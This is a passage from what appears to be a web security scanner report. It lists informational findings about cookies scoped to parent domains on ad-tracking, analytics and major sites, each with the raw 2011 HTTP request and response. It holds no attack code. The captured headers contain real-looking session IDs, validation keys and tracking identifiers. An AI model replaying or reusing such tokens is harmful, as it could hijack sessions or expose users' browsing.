Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567813&arc=42361216&exp=1307964868; ar_p104567837=exp=1&initExp=Mon Jun 13 11:34:28 2011&recExp=Mon Jun 13 11:34:28 2011&prad=63567813&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 302 Redirect
Server: nginx
Date: Tue, 14 Jun 2011 00:16:20 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010580; expires=Wed 15-Jun-2011 00:16:20 GMT; path=/; domain=.voicefive.com;
Set-Cookie: ar_p104567837=exp=3&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:16:20 2011&prad=63567820&arc=42361216&; expires=Mon 12-Sep-2011 00:16:20 GMT; path=/; domain=.voicefive.com;
Location: http://b.voicefive.com/p?c1=4&c2=p104567837&c3=63567820&c4=42361216&c5=&c6=3&c7=Mon%20Jun%2013%2011%3A34%3A28%202011&c8=&c9=&c10=&c15=&rn=1308010580
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent
Content-Length: 0


11.10. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6036034&rn=828106784&c12=781821643-1552181814-1307987147375&c7=http%3A%2F%2Fwww.mtv.com%2Fontv%2F&c4=%2Fontv%2F&c5=20000&c8=MTV%20Original%20Shows%2C%20Reality%20TV%20Shows%20%7C%20Episode&c9=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 13 Jun 2011 17:45:52 GMT
Connection: close
Set-Cookie: UID=f68656b-184.84.69.32-1306935678; expires=Wed, 12-Jun-2013 17:45:52 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.11. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035148&d.c=gif&d.o=djglobal&d.x=252794533&d.t=page&d.u=http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Fnews-tech-technology.html%3Frefresh%3Don HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Pragma: no-cache
Date: Tue, 14 Jun 2011 00:13:56 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Thu, 13-Jun-2013 00:13:56 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.12. http://b.voicefive.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=4&c2=p104567837&c3=63567820&c4=42361216&c5=&c6=2&c7=Mon%20Jun%2013%2011%3A34%3A28%202011&c8=&c9=&c10=&c15=&rn=1308010528 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; UID=4a757a7-24.143.206.42-1305663172; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Pragma: no-cache
Date: Tue, 14 Jun 2011 00:16:55 GMT
Connection: close
Set-Cookie: UID=4a757a7-24.143.206.42-1305663172; expires=Thu, 13-Jun-2013 00:16:55 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2713133&PluID=0&e=0&w=300&h=250&ord=3138287&ifrm=1&ucm=true&ifl=$$/static_html_files/addineyeV2.html$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b26/3/0/%2a/i%3B239895957%3B0-0%3B0%3B15527176%3B4307-300/250%3B42522129/42539916/1%3B%3B%7Eokv%3D%3B%3Bs%3D8_10001%3Bmc%3Db2pfreezone%3Btile%3D6%3Bsz%3D336x280%2C300x250%3B%3Bbsg%3D122689%3Bbsg%3D122690%3B%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3f$$&z=39 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=6;sz=336x280,300x250;ord=4904490449044904;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=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; B3=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

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=le30aXzt06hH00002jDClaTYi0cbS00001kkgaaRpa038X00001hITfaPj402WG00001jkozaUUI0c7w00001kfxTaPj40aLz00001iWmhaSED0cb100001jNtbaUUO09sO00000kfL6aPj30aLz00001htTqaPvL02WG00001jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001iOnPaUUK03sY00001kDFiaPj408HF00001kDBSaRp908HF00001jxYWaUMm0bn800001kMmAaPj208B400001jpQXaRwv05qO00001kHfhaPj302WG00001hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001jkncaRBL0c7w00001jBrJaXnt035P00001kSTxaRuU06yP00001jA0ZaPj206hH00001kGfMaPj208HF00002jkpdaPj30c7w00001jNtfaUUK09sO00000kCKXaXnm08HG00001kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kDAVaRp908HF00001kMqaaPj302WG00001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001kMnvaPj008B400001kcLvaUUK0dCb00001; expires=Sun, 11-Sep-2011 20:13:56 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=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; expires=Sun, 11-Sep-2011 20:13:56 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 14 Jun 2011 00:13:55 GMT
Connection: close
Content-Length: 2180

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

11.14. http://c.microsoft.com/trans_pixel.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.microsoft.com
Path:   /trans_pixel.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trans_pixel.asp?type=pv HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://windows.microsoft.com/en-US/internet-explorer/products/ie/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; msdn=L=1033; WT_NVR_RU=0=msdn:1=:2=; mcI=Thu, 09 Jun 2011 16:24:17 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=11779L002j13n0002g10103; ixpLightBrowser=0; _vis_opt_s=1%7C; R=200024632-6/4/2011 17:55:19; s_nr=1307360954509-Repeat; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/06/2011 11:52:41&Microsoft.VisitStartDate=06/06/2011 11:52:41&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=23&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1307350365395:ss=1307350365395

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MS0=52319cad089b46ffaf7cb2f75a658057; domain=.microsoft.com; expires=Tue, 14-Jun-2011 01:04:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:34:16 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

11.15. http://cf.addthis.com/red/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=4&gen=1000&gen=100&sid=4df74dbbd76c223d&callback=_ate.ad.hrr&pub=xa-4a9728942b1daf7e&uid=4dce8a530508b02d&url=http%3A%2F%2Fchartupload.com%2F&ref=http%3A%2F%2Fwww.livewithoscar.com%2FCalendar.aspx&1o71l2i HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh44.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1307911311.1FE|1306359996.1OD|1307911311.60|1307911311.1EY; dt=X; psc=1; uid=4dce8a530508b02d; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Tue, 14 Jun 2011 12:02:05 GMT
Set-Cookie: di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1307911311.1FE|1307911311.60|1307911311.1EY|1306359996.1OD; Domain=.addthis.com; Expires=Thu, 13-Jun-2013 12:02:05 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 14-Jul-2011 12:02:05 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Tue, 14 Jun 2011 12:02:04 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

11.16. http://cm.mtv.overture.com/js_flat_1_0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.mtv.overture.com
Path:   /js_flat_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_flat_1_0/?source=viacom_mtv_ctxt&outputCharEnc=latin1&ctxtUrl=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml&cb=5789&config=1458724563&maxCount=3 HTTP/1.1
Host: cm.mtv.overture.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=392qmnl6tfcas&b=3&s=n2; UserData=02u3hs9yoaLQsFTjBpdHN1MjJzNHI0tDS0NnBUdk%2bLSi4sTU1JNbEBAGNDCwNHCwNXIycAVxhWCw0=

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:18:17 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpdHN1MjJzNHI0tDS0NnBUdk%2bLSi4sTU1JNbEBAGNDCwMLJ1NjMxMAM7FV5gw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Fri, 11-Jun-2021 00:18:18 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=ISO-8859-1
Content-Length: 181

zCn = "";
zRef = "";
zSr = new Array("Reach 80% of active Internet users with Yahoo!.",
"",
"",
"Ads by Yahoo!",
"http://info.yahoo.com/services/us/yahoo/ads/details.html",
"");


11.17. http://en.wordpress.com/signup/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wordpress.com
Path:   /signup/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup/?ref=bottomtext HTTP/1.1
Host: en.wordpress.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11735858.1306026914.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11735858.346046317.1306026914.1306026914.1306026914.1; __gads=ID=f0b3fa9d26834653:T=1306026913:S=ALNI_MZ0OMj1z1zmHsmoQjjRWjvET1tf7Q; __qca=P0-326664433-1306026921591; optimizelyEndUserId=oeu1308011432464r0.4658326841890812; optimizelyBuckets=%7B%7D

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 14 Jun 2011 00:31:10 GMT
Content-Type: text/html
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Set-Cookie: ref=bottomtext; path=/; domain=wordpress.com
Location: https://en.wordpress.com/signup/
Vary: Accept-Encoding
Content-Length: 0


11.18. http://ib.adnxs.com/pxj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /pxj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=13&seg=49740&action=as(133789898);as(133443903);as(133663613);&redir=http%3a%2f%2fad.yieldmanager.com%2fpixel%3fadv%3d95413%26t%3d2%26id%3d1203653%26id%3d1203654%26id%3d1203953 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3106981;type=forex803;cat=forex519;ord=1;num=1308052950?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIs34QChgBIAEoATCP5NfvBAoSCMmhAxAKGAIgAigCML3h1-8EEI_k1-8EGAI.; sess=1; uuid2=3420415245200633085; anj=Kfw)kByDuq(0vd+Be?5ZYTL)6.Z_6mLSHG^$Mglg7#[eC>jObf2zwmy_oS8-DXm*e#>#0f>d3dZ=.Yf*)KU:U06d*R.fph)H_wIT9tRpFa)wUT%mqW=pRsdqVv^RF35%n_Q^:cpr5ep:RI:d*Q]f*6TZ7orR1p>8.+e)7*ulP*$_/_codqSeTnPQP>ZAM@XtL54/JwQXp<6KdREg2=QaT_OW[I42DxyO0vuNdNH@YTHm9X@yt6*5*g%I1Qogv>8Tq%`QThqXzX=qcs%<gmwvgLpBvf_=fChnMmU8k-#bbkuvJg0W]L97!dw7-v:u(ugyd@(tyCzwAAbn#Z-w+U$[l:HEk@p52BEi]D@rNU2*+8*q>gQUqilVQggO[9ko.+?0i9M%Z?fQ69!SL$R`$t1n`NOCsZDnKfGRzP1Tlv(Rm(rKjW:hQtUqx_fbU.aM-m2s4huR<#1^A`tC'$O<aF7UI]Ro.hJ6Sm0@f*ktpgb!A_nBuSF%QuE</hv':wljA`MQbZvif8=xqil`6Rz0pB?RJHsX>UaDhJ[n::w6[afW'UlLx<[-=+iah4q>_UvmARnpCX4V761C=7wjlk%y8'o6yv9Jw2H=bBcvjQL5ie-mjik?DfGaDBk*Ydu!6yDm!cY$lIpJzm32kCFms?p

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 15-Jun-2011 12:02:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 12-Sep-2011 12:02:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%D>7)*0s]#%2L_'x%SEV/i#+U=4FO?KN1Ipz=Rr7(nTDn(:^i3A^y9mc%vk4^v$yM3WW6G<5`8#q8qLS%.Gg5e[?T1^Q#wfy+>=#D+$s`c#5ht?N!q[ZAHZ1Z1V/eu[*/Lv_57vy>OW./Lt5m[$+zzJenmsrKKAYXY`g:YsVsRgpK'OF`E!2(vac7eTsJ$24IKN+:vi0p2Vw4z^5M5[-UpnshgX'E)?:Y9+`!zXXV<:mwtEQ7$)SP3b`'e-P2$n)w5s#=o9'P(c`e$Y7?glSRJ1YeA-vr%D1[:uhGfeaNS1Lx.ms6'5d'+cbr*E6Tc!h?HlMCRk%]lkUSyLu#SV-)Ax5ikFBZe2^P('_rT)@y#bYwYoQWP[ekHnv4HBG!+W`^U(PHl:.wS<.iz$y+4Gd381>KYR8T$Pjtfc^V%wXDg:0]U!eVN)1?<Z^c?JYo]/qhGM9X+'[fL+NZDCegZnJmSKU0a.$PdC?@$<jBMMo5fRkmrTk]$1htod7UqFe1dz[=3cygdZJ5[m5*(Gc8br6EepfNh/G4MU[p3v$dot(NR$Ib:q[knP3F[/3vuc#>n6L[FU>fwd8x5<=ydvf=+HjP^G2Z; path=/; expires=Mon, 12-Sep-2011 12:02:42 GMT; domain=.adnxs.com; HttpOnly
Location: http://ad.yieldmanager.com/pixel?adv=95413&t=2&id=1203653&id=1203654&id=1203953
Date: Tue, 14 Jun 2011 12:02:42 GMT
Content-Length: 0


11.19. http://id.google.com/verify/EAAAAHyt9BxLLTssjy25y0llsBc.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAHyt9BxLLTssjy25y0llsBc.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAHyt9BxLLTssjy25y0llsBc.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Chordiant+Software
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=47=CQ41ekAkoyKhsSxp7Lsvf31W-xozO2BEa-Kufadz=x2vqM3hRhyIc_Jyf; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=47=lorCzpeeruyCsbBVsWEMMq0Dn_FEZO2YvQlh5PbRyvyK-EGYzmwzyA_2p0yLU1EIOsGj5P7ltQDj-N2Ero7RzOq6NjJuFZs5xUAH3SXWEGgb9bkdrXqd248wCK5T3lcc

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=48=oYl1reOuxXNi23oTvJQZ0t3G5szxhjVfMpw07OrS=ptCSwDYFJF_6ZZ3q; expires=Wed, 14-Dec-2011 12:27:46 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 14 Jun 2011 12:27:46 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

11.20. http://imx.mtv.com/sitewide/droplets/view_gen.jhtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imx.mtv.com
Path:   /sitewide/droplets/view_gen.jhtml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitewide/droplets/view_gen.jhtml?itemUrl=cms_item%3A%2F%2Fwww.mtv.com%2F10325912&tagParams=tag_action%3Dviewed%26 HTTP/1.1
Host: imx.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Length: 0
Content-Type: text/html
